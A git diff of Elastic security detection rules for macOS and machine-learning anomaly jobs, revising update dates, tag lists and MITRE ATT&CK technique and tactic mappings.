a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml +++ b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -99,36 +99,26 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.004" -name = "Elevated Execution with Prompt" -reference = "https://attack.mitre.org/techniques/T1548/004/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml index 367e44f0902..f295bcc10c8 100644 --- a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml +++ b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -104,31 +104,36 @@ In macOS environments, the `security_authtrampoline` process is used to execute [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.004" name = "Elevated Execution with Prompt" reference = "https://attack.mitre.org/techniques/T1548/004/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml index 735d71241ce..0b7b102ae56 100644 --- a/rules/macos/privilege_escalation_local_user_added_to_admin.toml +++ b/rules/macos/privilege_escalation_local_user_added_to_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -44,7 +44,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -94,36 +101,19 @@ In macOS environments, tools like `dscl` and `dseditgroup` manage user group mem [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/macos/privilege_escalation_root_crontab_filemod.toml b/rules/macos/privilege_escalation_root_crontab_filemod.toml index b9c9f402814..49a80762627 100644 --- a/rules/macos/privilege_escalation_root_crontab_filemod.toml +++ b/rules/macos/privilege_escalation_root_crontab_filemod.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -47,7 +47,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -94,36 +101,19 @@ Crontab files in macOS are used to schedule tasks, often requiring elevated priv [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/macos/privilege_escalation_user_added_to_admin_group.toml b/rules/macos/privilege_escalation_user_added_to_admin_group.toml index 52cfa42cab7..eb4046a403c 100644 --- a/rules/macos/privilege_escalation_user_added_to_admin_group.toml +++ b/rules/macos/privilege_escalation_user_added_to_admin_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["jamf_protect"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.investigate]] @@ -84,7 +84,14 @@ Jamf Protect is integrated into the Elastic Agent using Fleet. Upon configuratio - Click "Save and Continue". """ severity = "low" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Jamf Protect", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Jamf Protect", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -96,36 +103,19 @@ configuration where host.os.type == "macos" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml index 77d18fd3e27..677898f0c23 100644 --- a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml +++ b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 @@ -116,23 +116,14 @@ DNS tunneling exploits the DNS protocol to covertly transmit data between a comp - Coordinate with IT and security teams to apply necessary patches and updates to the affected system to close any vulnerabilities exploited by the attacker.""" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml index 1e4fb206c9e..390ff8b41e2 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 @@ -78,7 +78,13 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "91f02f01-969f-4167-8f55-07827ac3acc9" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Initial Access", "Tactic: Reconnaissance", "Resources: Investigation Guide"] +tags = [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis @@ -117,49 +123,19 @@ The 'Unusual Web Request' detection leverages machine learning to identify rare - Review and update firewall and intrusion detection/prevention system (IDS/IPS) rules to better detect and block uncommon URLs associated with command-and-control activities.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1189" -name = "Drive-by Compromise" -reference = "https://attack.mitre.org/techniques/T1189/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.003" -name = "Wordlist Scanning" -reference = "https://attack.mitre.org/techniques/T1595/003/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml b/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml index 521c82e9536..8ad611b108e 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 @@ -76,7 +76,13 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "91f02f01-969f-4167-8d77-07827ac4cee0" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Reconnaissance", "Resources: Investigation Guide"] +tags = [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis @@ -115,31 +121,19 @@ User agents identify applications interacting with web servers, typically browse - Report the incident to the appropriate internal teams and, if necessary, escalate to external cybersecurity authorities or partners for further investigation and support.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml index 50b24290b61..e2c5d123724 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 75 @@ -135,18 +135,14 @@ The 'Spike in Logon Events' detection leverages machine learning to identify ano - Enhance monitoring and alerting mechanisms to detect similar spikes in logon events in the future, ensuring rapid response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml index 06017cb240b..3305439fe96 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/06/18" [rule] anomaly_threshold = 75 @@ -115,35 +115,48 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "e26aed74-c816-40d3-a810-48d6fbd8b2fd" severity = "low" -tags = ["Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Credential Access", "Tactic: Initial Access", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/ml/execution_ml_windows_anomalous_script.toml b/rules/ml/execution_ml_windows_anomalous_script.toml index f233da07dca..af93615b61d 100644 --- a/rules/ml/execution_ml_windows_anomalous_script.toml +++ b/rules/ml/execution_ml_windows_anomalous_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 50 @@ -108,40 +108,31 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Execution", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/ml/initial_access_ml_auth_rare_user_logon.toml b/rules/ml/initial_access_ml_auth_rare_user_logon.toml index 381607c588e..47a768779c8 100644 --- a/rules/ml/initial_access_ml_auth_rare_user_logon.toml +++ b/rules/ml/initial_access_ml_auth_rare_user_logon.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/06/18" [rule] anomaly_threshold = 75 @@ -116,30 +116,35 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "138c5dd5-838b-446e-b1ac-c995c7f8108a" severity = "low" -tags = ["Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml index b592f2f66d1..b4a53fb620b 100644 --- a/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml +++ b/rules/ml/initial_access_ml_windows_rare_user_type10_remote_login.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 50 @@ -77,35 +77,26 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Tactic: Lateral Movement", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/ml/ml_high_count_events_for_a_host_name.toml b/rules/ml/ml_high_count_events_for_a_host_name.toml index 881ee8ef844..3af1d24172b 100644 --- a/rules/ml/ml_high_count_events_for_a_host_name.toml +++ b/rules/ml/ml_high_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 @@ -92,3 +92,59 @@ The detection of a spike in host-based traffic leverages machine learning to ide - Implement network segmentation to limit the spread of potential threats and reduce the impact of similar incidents in the future. - Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional resources are needed for a comprehensive response.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" + +[[rule.threat.technique]] +id = "T1499" +name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" diff --git a/rules/ml/ml_high_count_network_denies.toml b/rules/ml/ml_high_count_network_denies.toml index 108b838ecfb..39e7bd4d1f3 100644 --- a/rules/ml/ml_high_count_network_denies.toml +++ b/rules/ml/ml_high_count_network_denies.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 @@ -74,7 +74,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "eaa77d63-9679-4ce3-be25-3ba8b795e5fa" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Discovery", "Tactic: Impact", "Tactic: Reconnaissance", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -114,38 +114,70 @@ Firewalls and ACLs are critical in controlling network traffic, blocking unautho [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + [[rule.threat.technique]] -id = "T1498" -name = "Network Denial of Service" -reference = "https://attack.mitre.org/techniques/T1498/" +id = "T1590" +name = "Gather Victim Network Information" +reference = "https://attack.mitre.org/techniques/T1590/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" [[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" +id = "T1499" +name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/ml_high_count_network_events.toml b/rules/ml/ml_high_count_network_events.toml index 84ceaa444bc..788730443c5 100644 --- a/rules/ml/ml_high_count_network_events.toml +++ b/rules/ml/ml_high_count_network_events.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 @@ -110,3 +110,55 @@ Machine learning models analyze network traffic patterns to identify anomalies, - Review and update network access controls and permissions to ensure only authorized users and devices have access to sensitive data and systems. - Implement enhanced monitoring and alerting for similar traffic patterns to improve early detection and response to future incidents.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[[rule.threat]] 